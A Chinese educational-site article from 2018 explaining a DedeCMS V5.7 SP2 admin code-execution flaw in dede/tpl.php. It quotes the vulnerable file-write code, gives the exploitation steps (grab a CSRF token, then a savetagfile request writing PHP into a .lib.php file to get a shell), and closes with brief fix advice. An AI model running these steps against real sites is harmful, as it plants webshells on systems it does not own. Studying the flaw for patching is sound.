好学若饥 - 让我们共同前行!

好学网


当前位置: 好学网首页 > IT教育 > dedecms >

DedeCMS V5.7 SP2后台代码执行漏洞

时间:2018-06-04 15:36来源:好学网 作者:haoxuee 点击:
漏洞详情 织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。 dede/tpl.php中第251行到281行 csrf_check(); if(!preg_match(#^[a-z0-9_-]{1,}\.lib\.php$#i, $filename)) { ShowMsg('文件名不合法,不允许进行操

        漏洞详情

织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。

dede/tpl.php中第251行到281行

csrf_check();

if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

{

ShowMsg('文件名不合法,不允许进行操作!', '-1');

exit();

}

require_once(DEDEINC.'/oxwindow.class.php');

$tagname = preg_replace("#\.lib\.php$#i", "", $filename);

$content = stripslashes($content);

$truefile = DEDEINC.'/taglib/'.$filename;

$fp = fopen($truefile, 'w');

fwrite($fp, $content);

fclose($fp);
1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。
注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。

漏洞利用

1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值

token.jpg

然后访问

域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%**phpinfo();?%3E&token=[你的token值
moonsec.jpg

shell:

域名 + /include/taglib/moonsec.lib.php
shell.jpg

漏洞修复

1.禁止此处写入文件。

2.过滤恶意标签

(责任编辑:haoxuee)

      学友请微信搜索好学网,或加公众号 haoxueecom 获取更多学习资讯!      

赞一个
(0)
0%
嘘一下
(0)
0%
------分隔线----------------------------